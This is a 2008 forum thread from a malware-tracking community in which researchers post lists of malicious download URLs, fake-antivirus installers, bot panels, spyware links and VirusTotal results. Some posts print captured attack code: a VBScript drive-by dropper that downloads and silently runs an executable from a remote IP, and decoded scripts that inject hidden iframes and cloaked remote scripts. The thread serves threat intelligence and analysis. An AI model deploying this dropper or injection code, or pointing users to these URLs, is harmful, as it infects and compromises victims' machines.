Malware Domain List
Malware Related => Malicious Domains => Topic started by: lanvin on September 07, 2008, 07:26:41 pm
-
http://218.22.180.43:81/445566.exe
http://first-reason.com/data/uhuybfgybff/0000005378.exe
http://dd5.tesekl.info/3.exe
http://www.cu108.com/linkme.exe
http://ruanjian2008.kki.cn/0.exe
http://ruanjian2008.kki.cn/2.exe
http://dd4.tesekl.info/not.exe
20080908...
-
http://www.qq-new.cn/shengji.exe
http://wm.xnibi.com/'http://m.c5x8.com/mm.exe
http://www.cu108.com/linkme.exe
http://www.zmjjjyy.cn/new/a2.css
http://down.hs7yue.cn/down/UU.ini
http://down.hs7yue.cn/down/sina.exe/
20080909
-
http://l.ljsrx.com/test222.exe
http://down.hs7yue.cn/down/sina.exe
http://www.zmjjjyy.cn/new/a1.css
http://61.164.118.208/new/new1.exe
http://61.164.118.208/new/new2.exe
http://61.164.118.208/new/new3.exe
http://61.164.118.208/new/new4.exe
http://61.164.118.208/new/new5.exe
http://61.164.118.208/new/new6.exe
http://61.164.118.208/new/new7.exe
http://61.164.118.208/new/new8.exe
http://61.164.118.208/new/new9.exe
http://61.164.118.208/new/new10.exe
http://61.164.118.208/new/new11.exe
http://61.164.118.208/new/new12.exe
http://61.164.118.208/new/new13.exe
http://61.164.118.208/new/new14.exe
http://61.164.118.208/new/new15.exe
http://61.164.118.208/new/new16.exe
http://61.164.118.208/new/new17.exe
http://61.164.118.208/new/new18.exe
http://61.164.118.208/new/new19.exe
http://61.164.118.208/new/new20.exe
http://61.164.118.208/new/new21.exe
http://61.164.118.208/new/new22.exe
http://61.164.118.208/new/new23.exe
http://61.164.118.208/new/new24.exe
http://61.164.118.208/new/new25.exe
http://61.164.118.208/new/new26.exe
http://61.164.118.208/new/new27.exe
http://61.164.118.208/new/new28.exe
-
hxxp://av355.110mb.com/gate/gate.php?stat=1
hxxp://magmob.info-com.ru/gate/gate.php
hxxp://www.cybertm.tu1.ru/admin/admin.php
hxxp://www.dmc-dmc.1gb.in/gate/gate.php
hxxp://www.patr0n87.tu2.ru/reports/gate.php
hxxp://www.qsl.net/dl2bcm/
hxxp://www.anti-virus-xp.net/sysscan/132a071e5d1437b80c401c6982d513a0/1/
hxxp://www.anti-virus-xp.net/tools/virusremover.dll
hxxp://www.anti-virus-xp.net/check/132a071e5d1437b80c401c6982d513a0_16
hxxp://82.98.235.15/wupd/
-
http://222.179.185.117/1.exe
http://222.179.185.117/2.exe
......
http://222.179.185.117/30.exe
http://newymhf6.cn/3.exe
http://l.ljsrx.com/test222.exe
-
hxxp://xpsecuritycenter.com/XPSecurityCenter/latest/Installer.exe
hxxp://scan.antispyware-free-scanner.com
hxxp://files.as-pro-xp-download.com/load/setup_1_2_.exe
hxxp://virusremover2008.com/VRM_Free.exe?a=site&l=pay
hxxp://download.virusremover2008.com/VRM_Free.exe
hxxp://www.av-xp2008.com
hxxp://stat.av-xp2008.com/download/16/AntivirusXP2008Installer.exe
And what a surprize,lol...more crap hosted in the same ip obviously...
hxxp://antivirusxp-2008.net (EstDomains)
hxxp://stat.antivirusxp-2008.net/download/16/AntivirusXP2008Installer.exe (EstDomains)
-
http://user9.78-10.net/list/sk01.exe
http://user9.78-10.net/list/sk02.exe
http://user9.78-10.net/list/sk03.exe
http://user9.78-10.net/list/sk04.exe
http://user9.78-10.net/list/sk05.exe
http://user9.78-10.net/list/sk06.exe
http://user9.78-10.net/list/sk07.exe
http://user9.78-10.net/list/sk08.exe
http://user9.78-10.net/list/sk09.exe
http://user9.78-10.net/list/sk10.exe
http://user9.78-10.net/list/sk11.exe
http://user9.78-10.net/list/sk12.exe
http://user9.78-10.net/list/sk13.exe
http://user9.78-10.net/list/sk14.exe
http://user9.78-10.net/list/sk15.exe
http://user9.78-10.net/list/sk16.exe
http://user9.78-10.net/list/sk17.exe
http://user9.78-10.net/list/sk18.exe
http://user9.78-10.net/list/sk19.exe
http://user9.78-10.net/list/sk20.exe
http://user9.78-10.net/list/sk21.exe
http://user9.78-10.net/list/sk22.exe
http://user9.78-10.net/list/sk23.exe
http://user9.78-10.net/list/sk24.exe
http://user9.78-10.net/list/sk25.exe
http://user9.78-10.net/list/sk26.exe
http://user9.78-10.net/list/sk27.exe
http://user9.78-10.net/list/sk28.exe
http://user9.78-10.net/list/sk29.exe
http://user9.78-10.net/list/sk30.exe
-
Read this blog article
http://s3cwatch.wordpress.com/2008/09/11/wwwok2bstr8comindex_13html/ (http://s3cwatch.wordpress.com/2008/09/11/wwwok2bstr8comindex_13html/)
There is a lot more of such crap.
http://www.google.com/search?q=%22ActiveX+Object+to+play+this+video+file%22+%22HARDCORE+VIDEO+ONLINE%22&site=intl&filter=0 (http://www.google.com/search?q=%22ActiveX+Object+to+play+this+video+file%22+%22HARDCORE+VIDEO+ONLINE%22&site=intl&filter=0)
Example from google links :
www.hot9.ru/index.php?p_id=138
links to
http://softload2009q.com/download/502/1410/0/
downloads MediaTubeCodec_ver1.1410.0.exe.
VT Result:
http://www.virustotal.com/de/analisis/e040a14bb3b30e35eaf59a141d5e37b6 (http://www.virustotal.com/de/analisis/e040a14bb3b30e35eaf59a141d5e37b6)
-
http://www.host1550.com/modulos/gera.jpg
http://loaddds.com/file.exe
http://security-prof.com/2009/download/trial/AV2009Install_77024207.exe
http://m.c5x8.com/mm.exe
-
hxxp://www.skigiesing.de/bilder/kashir.exe
hxxp://fotolog.host.sk/foto.php?=
hxxp://on1000000.cn/Get7IT.php
hxxp://ferrychi445677.com/Get7ITU.php -> -> EstDomains
hxxp://bmwx6foreva.ru/loads/engine3.bin
hxxp://my-socks.info/lll.exe -> EstDomains
hxxp://de-my-page.info/img/scan_trCRY.exe -> EstDomains
hxxp://79.132.211.50/alex/1.exe
hxxp://58.65.235.41/ndl/index.php -> control panel,pretty lame ;-)
hxxp://58.65.235.41/ndl/controller.php?action=bot&entity_list=&rnd=982142
hxxp://monsterlink.org/spl/exe.php
hxxp://www.0xfffffffff.net/spl/index.php
hxxp://165.194.30.123/qwerty/traf.php
hxxp://rivatos.net/tds/in.cgi?default -> EstDomains
hxxp://rivatos.net/in.cgi?idb1
hxxp://rivatos.net/tds/in.cgi?3
hxxp://rivatos.net/tds/in.cgi?2
hxxp://myfrooogle.cn/z/index.php
hxxp://onlinececk.com/ -> pdf exploits also in the past there as well / EstDomains
hxxp://www.anti-virus-xp.net/sysscan/132a071e5d1437b80c401c6982d513a0/1/
hxxp://www.anti-virus-xp.net/check/132a071e5d1437b80c401c6982d513a0_16
hxxp://www.anti-virus-xp.net/tools/virusremover.dll
hxxp://guidetosuccess.name/images/index.php -> EstDomains
hxxp://guidetosuccess.name/images/ff.jar
hxxp://guidetosuccess.name/images/ff2.jar
hxxp://guidetosuccess.name/images/lv.jar
hxxp://guidetosuccess.name/images/ff4.jar
hxxp://guidetosuccess.name/images/ff3.jar
hxxp://guidetosuccess.name/images/ff5.jar
hxxp://guidetosuccess.name/images/ff7.jar
hxxp://guidetosuccess.name/images/ff12.jar
hxxp://guidetosuccess.name/images/ff6.jar
hxxp://guidetosuccess.name/images/ff8.jar
hxxp://guidetosuccess.name/images/ff9.jar
hxxp://guidetosuccess.name/images/ff13.jar
hxxp://guidetosuccess.name/images/ff14.jar
hxxp://guidetosuccess.name/images/ff10.jar
hxxp://guidetosuccess.name/images/ff15.jar
hxxp://guidetosuccess.name/images/ff11.jar
hxxp://guidetosuccess.name/images/loade.php
-
http://www.qq-songli.cn/001.exe
http://www.qq-songli.cn/002.exe
http://www.qq-songli.cn/003.exe
http://www.qq-songli.cn/004.exe
http://www.qq-songli.cn/005.exe
http://www.qq-songli.cn/006.exe
http://www.qq-songli.cn/007.exe
http://www.qq-songli.cn/008.exe
http://w.stopcao.cn/good/x.exe
http://www.zmjjjyy.cn/down/ko.exe
http://down.hs7yue.cn/down/ko.css
-
Site Domain : 0catch.com
Site Location: United States of America
Threat Links on this site(part of them):
http://wrkshp14.0catch.com/kettlebells-uk.html
http://jyg7321.0catch.com/
http://wrkshp5.0catch.com/scorpio-tattoo.html
http://keaydi.0catch.com/
http://wrkshp14.0catch.com/hoist-dumbbells.html
http://wrkshp15.0catch.com/campbells-chicken-noodle-soup.html
http://wrkshp14.0catch.com/custom-doorbells.html
http://wrkshp14.0catch.com/crazy-fogs-jingle-bells-mp3.html
http://wrkshp14.0catch.com/deagan-bells.html
http://pedomederpel.0catch.com/
Site Domain : 218.22.180.43
Site Location: China
Threat Links on this site(part of them):
http://218.22.180.43:81/vmdetdhc.htm
http://218.22.180.43/TuTu01.exe
http://218.22.180.43/w.exe
http://218.22.180.43/w.exe
http://218.22.180.43:81/445566.exe
-
Thanks Lanvin,I somehow missed this topic but much appreciate the links. :P
http://lovelypornovideo.net/load.php?aff=&/HDVideoCodec_ver1..0.exe
http://pornotube30.net/getsoft/79_003.exe
http://usuarios.lycos.es/libredll/udp.nnn
http://ranchsource.com/files/778r.jpg
http://ranchsource.com/files/777.jpg
http://files657284.net/b2b/dmlatc.cgi
http://files657284.net/b2b/load/nlatdm.exe
http://files657284.net/b2b/load/vmairn.exe
http://files657284.net/b2b/load/djdnxl.exe
http://www.moduloscriticos.com.br/mod/configdw.txt
http://www.moduloscriticos.com.br/mod/imlog.jpg
http://www.moduloscriticos.com.br/mod/imbdj.jpg
http://www.moduloscriticos.com.br/mod/implug.jpg
http://www.moduloscriticos.com.br/mod/immsn.jpg
http://www.moduloscriticos.com.br/mod/imok.jpg
http://www.moduloscriticos.com.br/mod/config.jpg
http://www.moduloscriticos.com.br/mod/mslink.jpg
http://75.125.233.171/julho/imlog.jpg
http://www.marajo03.kit.net/imbdj.jpg
http://75.125.233.171/julho/implug.jpg
http://www.marajo00.kit.net/imok.jpg
http://avzhan.3322.org:81/1.exe
http://78.157.143.251/bho/msfont.dll
http://m.c5x8.com/mm.exe
http://www.sognilucidi.it/forum/download/.http/~/foto1.jpg
http://goldbye.vicp.net/svchost1.exe
http://goldbye.vicp.net/Cyber02Hide.exe
http://omega-sts.ru/usr/templates/CVS/.dc/visualizador
http://globalcenter.home.sapo.pt/1.gif
http://globalcenter.home.sapo.pt/2.gif
http://globalcenter.home.sapo.pt/3.gif
http://transito2009.web26.f3.k8.com.br/msmask32.jpg
http://transito2009.web26.f3.k8.com.br/ossmtp.jpg
http://transito2009.web26.f3.k8.com.br/estrela.jpg
http://transito2009.web26.f3.k8.com.br/file_new.jpg
http://www.florenca2009.com/config/config.dll
-
[quote author=CM_MWR link=topic=2207.msg5599#msg5599 date=1221389857]
Thanks Lanvin,I somehow missed this topic but much appreciate the links. :P
m/config/config.dll
dig from your post:)
http://75.125.233.171/mod/modplug14.jpg
http://m.c5x8.com/flashmm.exe
http://m.d5x8.com/dd/9.exe
http://m.c5x8.com/dd/3.exe
http://2.trojan8.com/dd/10.exe
http://m.c5x8.com/dd/2.exe
http://m.c5x8.com/dd/1.exe
-
http://reda-vision.com/config.exe
http://www.virustotal.com/analisis/a10b9cdb94e166d12caed1093db639ac (http://www.virustotal.com/analisis/a10b9cdb94e166d12caed1093db639ac)
More info about it here
http://www.cs.ucsb.edu/~marco/blog/2008/09/backdoored-php-shells.html (http://www.cs.ucsb.edu/~marco/blog/2008/09/backdoored-php-shells.html)
-
Thank you.
-
hxxp://193.33.61.169/cntr.gif
hxxp://91.203.92.25/hvha/4683lt.exe
hxxp://ksn.a1001186.wrs.flutix.com/meane.stf
hxxp://lolika.cn/docs/us.txt
hxxp://lolika.cn/docs/us2.txt
hxxp://lolika.cn/docs/us3.txt
hxxp://www.mediacodec.co.cc/justplayit.exe
Pinches here...
hxxp://ks4sk.fatal.ru/1/1.php
hxxp://mechta2.freehostia.com -> Open dir,check for logs and other stuff there...
hxxp://skkeyg.freehostia.com -> Open dir,check for logs and other stuff there...
Hunting for Pinches really pays back sometimes...
hxxp://c.bestnews.cc/e/buf.png -> Result: 0/36 (0%)
http://www.virustotal.com/analisis/54a9ba01bdd03fce710d9cceafb0d2e4
hxxp://c.bestnews.cc/e/mov.qt -> Result: 2/36 (5.56%)
http://www.virustotal.com/analisis/5ac531f64205150158da7b6d6153e8ea
hxxp://c.bestnews.cc/file.php?o=7&q=2&w=fire -> Result: 13/36 (36.12%)
http://www.virustotal.com/analisis/bad64f314a091e12a1957a252cd3f5c0
Also digged a webshell from there...
hxxp://bestnews.cc/tools.rar
All stuff from bestnews.cc added in attachment,note that it's NOT password-protected...
-
http://91.203.92.25/hvha626/s6c4n6s.exe
http://91.203.92.25/hvha123/ex32de.exe
http://ksn.a.wrs.mcboo.com/17PHolmes.cmt
http://ksn.a.wrs.flutix.com/meane.stf
http://lolika.cn/docs/tips.txt (MZ)
dig.......:)
-
http://2.trojan8.com/dd/1.exe
http://2.trojan8.com/dd/2.exe
http://2.trojan8.com/dd/6.exe
http://2.trojan8.com/dd/9.exe
-
zango.com
http://downloads.zango.com/zangogames/chamber/setupchamber2848.exe
http://downloads.zango.com/zangogames/dvg/setupdavid2365.exe
http://downloads.zango.com/zangogames/zangotv/setupzangotv2593.exe
http://downloads.zango.com/zangogames/library/setuplibrary2797.exe
http://ftp.surfnet.nl/simtel/win95/secsys/passpectpro32.exe
180solutions.com
http://bis.180solutions.com/downloads/msbb.exe
hotbar.com
http://installs.hotbar.com/installs/hotbar/programs/hotbar.exe
http://www.hbdownloads.com/installs/hotbar/programs/hotbarinst.exe
http://installs.hotbar.com/installs/hbtools/programs/hbtools.exe
http://installs.hotbar.com/installs/hbtools/programs/hbtools.cab
http://installs2.hotbar.com/installs/hotbar/programs/hotbar.exe
zangocash.com
http://static.zangocash.com/Setup/53/Zango/Setup.exe
http://static.zangocash.com/Setup/53/Seekmo/Setup.exe
please dig
gophergas.com
albinoblacksheep.com
simtel.net
-
www.ulitka.de
has code
<SCRIPT language=VBScript>
on error resume next
dl = "http://210.202.194.167/banco.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="http://www.ulitka.de/index2.html"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</SCRIPT>
to download
http://210.202.194.167/banco.exe
-
Thanks.
-
prtectionactivescan.com
http://softwaredesign6.com/2009/download/trial/A9loader_770522160214.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164720.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_77052201.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164437.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.freewebs.com/chipxinh503/GirlKuTe.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cao-2.cn/Real10.js
http://www.cao-1.cn/Real10.js
http://202.106.195.23:6688/aicss_test241.css (invalid)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
as-pro-xp-download.com
http://files.as-pro-xp-download.com/load/setup_100525_3_.exe
http://files.as-pro-xp-download.com/load/setup_110084_3_.exe
http://files.as-pro-xp-download.com/load/setup_110102_3_.exe
http://files.as-pro-xp-download.com/load/setup_100525_6_.exe
http://files.as-pro-xp-download.com/load/setup_110151_3_.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
91.121.138.222
http://91.121.138.222/~warman24/Setup_ver1.1706.0.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
allinonespy.com
http://www.allinonespy.com/all-in-one-spy.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ppexe.com/
http://www.ppexe.com/comine/2.exe
http://www.ppexe.com/comine/mfrj.exe
http://www.ppexe.com/comine/dwbins.exe
http://www.ppexe.com/comine/wowoaa.exe
http://www.ppexe.com/comine/mf.exe
http://www.ppexe.com/comine/ffxi369.exe
http://www.ppexe.com/new/1.exe
http://www.ppexe.com/comine/mf.exe
http://www.ppexe.com/comine/db820.exe
-
blazingtools.com
http://www.blazingtools.com/downloads/i_bpk2003.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
swmirror.com
http://dreamingsoft.swmirror.com/fcsetup.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
blazingtools.com
http://www.blazingtools.com/downloads/i_bpk2003.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
facaizhifuok.cn
http://facaizhifuok.cn/hb/1.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
Thanks Lanvin,
Some fun to play with
hxxp://rtrbenews.com/svchost.exe
hxxp://rtrbenews.com/svchost2.exe
hxxp://rtrbenews.com/svchost3.exe
hxxp://ontilop.net/_stub.exe
hxxp://wirexgold.com/explorer.exe
hxxp://rondolook.net/_stub.exe
hxxp://rondolook.net/123.exe
hxxp://wapbrazil.nexenservices.com/image/Gbsvs.exe
hxxp://79.135.167.18/sl32.exe
hxxp://79.135.167.18/scan4.exe
hxxp://79.135.167.18/cgi-bin/index.cgi?test2
hxxp://79.135.167.18/gpls32.exe1
hxxp://www.blogouf.com/images/closeframe.gif
hxxp://www.blogouf.com/images/logo-blogoufbig.gif
hxxp://wapbrazil.nexenservices.com/image/sys_Java.exe
hxxp://66.90.104.196/Autoupdate/Setup_ver1.1494.0.exe
hxxp://loaddds.com/file.exe
hxxp://sexoon.ifrance.com/link.jpg
hxxp://78.157.143.251/bho/msfont.dll
hxxp://www.gondolatriveneto.com/img/categorie/9_mai_big.jpg
hxxp://www.modulog2008.hpgvip.com.br/themida.jpg
hxxp://www.modulog2008.hpgvip.com.br/dynamic.jpg
hxxp://www.host1550.com/modulos/modulo.jpg
hxxp://www.host1550.com/modulos/gera.jpg
hxxp://www.host1550.com/modulos/plugin.jpg
hxxp://www.host1550.com/modulos/net.jpg
hxxp://www.host1550.com/modulos/msn.jpg
hxxp://www.host1550.com/modulos/orkut.jpg
hxxp://lovelypornovideo.net/load.php?aff=&/HDVideoCodec_ver1..0.exe
hxxp://pornotube30.net/getsoft/79_003.exe
hxxp://lidahua.3322.org/gz.exe
hxxp://lidahua.3322.org/jzllw.exe
hxxp://lidahua.3322.org/doudou.exe
hxxp://lidahua.3322.org/Down1.exe
hxxp://lidahua.3322.org/waigua.exe
hxxp://sortesorte009.mail333.su/familia.gif
hxxp://www.death-note.biz/up/img/22752.exe
hxxp://satellife.info/?&v=2608kj&lid=1033
hxxp://v2count.net/cc/ccdo.php?affid=5
hxxp://v2count.net/cc/srtytrewqertytrew.php?affid=5&code1=HOPH&code2=1257
hxxp://v2count.net/out/search.jpg
hxxp://v2count.net/out/winlogon.jpg
hxxp://v2count.net/out/tibs.jpg
hxxp://v2count.net/out/tool.jpg
hxxp://v2count.net/out/proxy.jpg
hxxp://russia-vs-georgia.org/admin/load.php?id=500357855
hxxp://freee.lviv.name/antivir/scan.exe
hxxp://freee.lviv.name/antivir/serv.exe
hxxp://freee.lviv.name/antivir/Setup_ver1.1254.0.exe
hxxp://freee.lviv.name/antivir/silent.exe
hxxp://www.ltb.com.co/portal/modules/pagesetter/doc/default/irs_efill.php
---------------------
208.66.194.232/40E8000842CFEBBCE21EFAC86C0000006866000000007600000147EB0005306A70777F
78.157.142.26/files/42/v2test7/file.exe
85.255.118.29/ppc/config.php?v=19&u=3259&acln=en-us&s=hxxp://www.google.com/&sch=n
85.255.118.29/ppc/config.phpchk
91.203.92.25/hvha626/s6c4n6s.exe
a486.g.akamai.net/wzcline23.exe
anti-virus-xp.net/images/1221042566/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.gif
anti-virus-xp.net/images/1221042578/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.ok?id=16
anti-virus-xp.net/images/1221043179/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.gif
googlescanners-360.com/2009/100/freescan.php?aid=880724
googlescanners-360.com/2009/download/trial/AV2009Install_880724.exe
total-secure2009.com/download.php
totalsecuredownload.com/TotalSecure2009.exe
xww.panel911.com/traffic/in.cgi?google1
xww.panel911.com/traffic/in.cgi?hunter
zonephp.com/del/us.exe
zonephp.com/del/us.php?1=duhme_0008dc42&i=
zonephp.com/del/us.php?2=duhme_0008dc42&n=0&v=16778773&i=&s=0&sp=0&lcp=0&pr=0
zonephp.com/del/us.php?2=duhme_0008dc42&n=1&v=16778773&i=&s=0&sp=0&lcp=0&pr=0
zonephp.com/del/userror
zonephp.com/ld.php?v=1&id=27718&rs=2087256932&cc=0
zonephp.com/ld.php?v=1&rs=2087256932
-
Thanks Lanvin,
Some fun to play with
~~~~~
Hi CM_MWR,
Thank you very much :)
-
hxxp://mr-z.ru/logs2/BlackWM222.exe
hxxp://0smp.ru/gpack/admin.php
hxxp://finito.fi.funpic.org/black/auth.php
hxxp://forsakens.freehostia.com/gate/
hxxp://pinch.freehostia.com/
hxxp://test.bboys.tu2.ru/gate.php
hxxp://www.tihvin.tu2.ru/italy/gate.php
-
And a special one as well,lol...that also earned Google's malware prevention warning,he-he...
http://www.google.com/search?hl=en&q=dlockley.com
hxxp://dlockley.com/
-
http://mdrop.md.funpic.org/habbo%20tools/flooder/macrotool.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://hipapatam.com/Client20.1531.0.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://dl-updates.freehostia.com/vc.txt (pe)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.bopings.com/a.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.kasdbrs.com/ld_vp002.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
http://www.6rb-ksa.com/vip.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://tudoforum.webcindario.com/verdinho.jpg PE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.pointcashbag.com/cashback/download/install.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://avzhan.3322.org:81/1.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://lyon2008.sitesled.com/image09776554foto01.exe
http://blackman717.sitesled.com/instal-tv-sexe-24h.exe
http://gaming3d.sitesled.com/DragonBot_3_FullSetup.exe
http://gaming3d.sitesled.com/sexbot_fullsetup.exe
http://gaming3d.sitesled.com/gzn_setup.exe
http://voce.sitesled.com/veja.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org/dl.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
http://dd6.tesekl.info/net.exe
http://danielblaskieviz.xpg.com.br/upload/imglog.jpg
http://download.sav2008.com/dload.php?actually=1&advid=5251
http://www.rotarymilanosudest.com/site_access/bollettini/2007-2008/agosto.exe
http://knut.kumoh.ac.kr/~kopress/board//skin/f2plus_gallery_2_0/.tmp/FrWall2.exe
http://www.1ive.net/count/Install.asp
http://cel33264578.xpg.com.br/imglog.xml
http://www.sabaozinhox.net/Source.exe
http://www.aera.gr/files/.slide/win32.exe
http://www.oflogao.com/tim/download/picture.exe
http://vivoonline.hpg.com.br/nosso.jpg
-
Another Fake Antivirus.
hxxp://your-windows-scanner.com/soft/r/AV2008install.exe
Virustotal
http://www.virustotal.com/analisis/9c6df880a6b4dee045da0543cb91bbed
hxxp://scanner.microantivirus2009.com/setup/install_511_MHwzNnwwfHx8fHx8fHw_.exe
VirusTotal
http://www.virustotal.com/analisis/6aee6527bd9aa13231eb0d831a0569d0
-
Spam related (DirectMailer) open dirs...
Google gives warning in quite a few of them,
so I assume that other 'goodies' might exist there as well,
but I haven't personally bothered checking in such detail...
hxxp://a1sfingerprinting.com
hxxp://adept-consult.com.au
hxxp://adgjm.us
hxxp://altai-himalaya.com
hxxp://antique-buddha-statues.com
hxxp://autechtrade.com
hxxp://busratings.com
hxxp://c-a-k-e.co.za
hxxp://crossroadsgroup.com.au
hxxp://epochengineering.net
hxxp://eurozsia.com.au/log/misc/
hxxp://gordonclub-bg.info
hxxp://gracetrailer.com
hxxp://jenesisarts.com
hxxp://kingstaracamp.com
hxxp://milward.biz
hxxp://onlinemetalart.com
hxxp://pci-controlobjectives.org
hxxp://printers-ftp-server.org
hxxp://tenthousandbuddhastudios.com
hxxp://trainingvitals.com.au
hxxp://tsunamidragteam.com
hxxp://vavilondv.com
hxxp://www.802-11wireless.net
hxxp://www.archangelgames.com
hxxp://www.assortedcream.net
hxxp://www.australianwaterlife.com.au
hxxp://www.crossroadsgroup.com.au
hxxp://www.dandtcorp.com.au
hxxp://www.giproductions.com.au
hxxp://www.heliodesign.com
hxxp://www.jsgray.com
hxxp://www.littlespider.com.au
hxxp://www.olmax.net
hxxp://www.sirbeavis.com
hxxp://www.withintemptation.com.au
-
hxxp://www.circadian.net/ayelet/
hxxp://www.casino-news.biz/
hxxp://unlimitedinspections.com/
hxxp://reddii.ru/traffic/sploit1/?
hxxp://meopta.ru/haitou.php
hxxp://meopta.ru/coi.html
hxxp://meopta.ru/coiu.html
hxxp://bestshaste.cn/good.html?
haitou.php is certainly a pain in the ass to decode it,scripts attached below...
-
...out of curiosity,I scanned the 'haitou-scripts-only.php" in VirusTotal:
http://www.virustotal.com/analisis/bed224b3a6050bdfd8826049f4755202
Result: 3/36 (8.34%)
The only part of it which is in plain text view,is the following...
<script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?tycoon3" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script>
As soon as I replaced xanjan.cn with google.com...
http://www.virustotal.com/analisis/9cc7dae965c757c745a80eb4c424b65e
Result: 2/36 (5.56%)
And when removing the whole of the aformentioned plain text script...
http://www.virustotal.com/analisis/63ed068268e977a32b92f70e7076f977
Result: 1/36 (2.78%)
In short,besides the...high-tech strings-based detection,
almost no AV got alarmed by the rest 5 remaining and heavily obfuscated scripts there?
-
http://www.lzitw.com/kj/hoho.exe
https://ssl1140.websiteseguro.com/nokiabrasil/Imagens_de_todos.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/Imagem_Jr.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/imagemsngr.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/Imagem_libs.jpg
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://www2.odn.ne.jp/~caj37650/jishin.exe
http://scanner.microantivirus-2009.com/setup/install_3697_MHwzNnwxMDEwMDAwMDAwfHx8fHx8fHw_.exe
http://scanner.microantivir2009.com/setup/install_1392_MHwzNnwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
http://www.spytech-web.com/spyagent/Files601/YahooDLL.dll
http://www.spytech-web.com/spyagent/Files/sbrowse.dat
http://www.spytech-web.com/spyagent/Files601/SystemSA32.dll
http://www.spytech-web.com/realtime-spy/Files20/NTInvisible.dll
http://dm.screensavers.com/dm/installers/si/1/sinstaller.cab
http://dm.screensavers.com/dm/installers/si/3/s_sinstallerandtoolbar3.exe
http://dm.screensavers.com/dm/installers/si/beta/s_sinstallerandtoolbar.exe
http://files.screensavers.com/sss/bin/sinstallerandtoolbar3.exe
-
hxxp://funciclearin.com/counter.php
hxxp://search-you-need.com/le/index.php?code=K2l7J41xQY
hxxp://www.mnbenio.ru/script.js
-
Hi sowhat-x,
here is the haitou.php thing. Lines separated by "--------------".
var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {
document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111117&ref='+escape(document.referrer)+'"></sc'+'ript>')
----------------
if (document.referrer != "http://verify.com") {
document.write("<span style='display:none' id='d1'>");
}
----------------
var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {
document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111115&ref='+escape(document.referrer)+'"></sc'+'ript>')
}
----------------
<script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?tycoon3" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script>
-----------------
if (document.referrer != "http://verify.com") {
document.write("<span style='display:none' id='d1'>");
